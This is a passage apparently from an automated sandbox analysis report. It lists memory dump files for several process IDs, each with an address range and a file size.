                                                                                                                                                                                              • memory/1500-1-0x0000000000140000-0x0000000001910000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                23.8MB

                                                                                                                                                                                              • memory/1500-0-0x0000000000140000-0x0000000001910000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                23.8MB

                                                                                                                                                                                              • memory/1500-4-0x0000000003BB0000-0x0000000003BB1000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/1500-31-0x0000000005C00000-0x0000000005C01000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/1500-83-0x00000000073D0000-0x00000000073D1000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/1500-82-0x0000000007A10000-0x0000000007A11000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/1500-32-0x0000000005C10000-0x0000000005C11000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/1500-186-0x00000000073E0000-0x00000000073E1000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/1500-185-0x0000000000140000-0x0000000001910000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                23.8MB

                                                                                                                                                                                              • memory/3808-12-0x0000000000140000-0x0000000001910000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                23.8MB

                                                                                                                                                                                              • memory/3808-27-0x0000000002350000-0x0000000002351000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/3808-199-0x0000000000140000-0x0000000001910000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                23.8MB

                                                                                                                                                                                              • memory/5020-381-0x0000000005A90000-0x0000000005A91000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/5020-375-0x0000000005A20000-0x0000000005A21000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/5020-384-0x0000000005AC0000-0x0000000005AC1000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/5020-386-0x0000000005AE0000-0x0000000005AE1000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/5020-383-0x0000000005AB0000-0x0000000005AB1000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/5020-382-0x0000000005AA0000-0x0000000005AA1000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/5020-357-0x0000000000140000-0x0000000001910000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                23.8MB

                                                                                                                                                                                              • memory/5020-380-0x0000000005A80000-0x0000000005A81000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/5020-378-0x0000000005A60000-0x0000000005A61000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/5020-379-0x0000000005A70000-0x0000000005A71000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/5020-373-0x00000000059E0000-0x00000000059E1000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/5020-377-0x0000000005A50000-0x0000000005A51000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/5020-376-0x0000000005A30000-0x0000000005A31000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/5020-385-0x0000000005AD0000-0x0000000005AD1000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/5020-374-0x0000000005A10000-0x0000000005A11000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/5020-372-0x00000000059D0000-0x00000000059D1000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/5020-387-0x0000000005AF0000-0x0000000005AF1000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/5020-388-0x0000000005900000-0x0000000005901000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/5020-389-0x0000000005A00000-0x0000000005A01000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/5020-390-0x0000000005A40000-0x0000000005A41000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/5020-371-0x00000000059C0000-0x00000000059C1000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/5020-368-0x00000000058E0000-0x00000000058E1000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/5020-402-0x0000000000140000-0x0000000001910000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                23.8MB

                                                                                                                                                                                              • memory/5020-370-0x00000000059A0000-0x00000000059A1000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/5020-369-0x0000000005990000-0x0000000005991000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/5020-367-0x00000000058C0000-0x00000000058C1000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/5020-362-0x0000000001F00000-0x0000000001F01000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB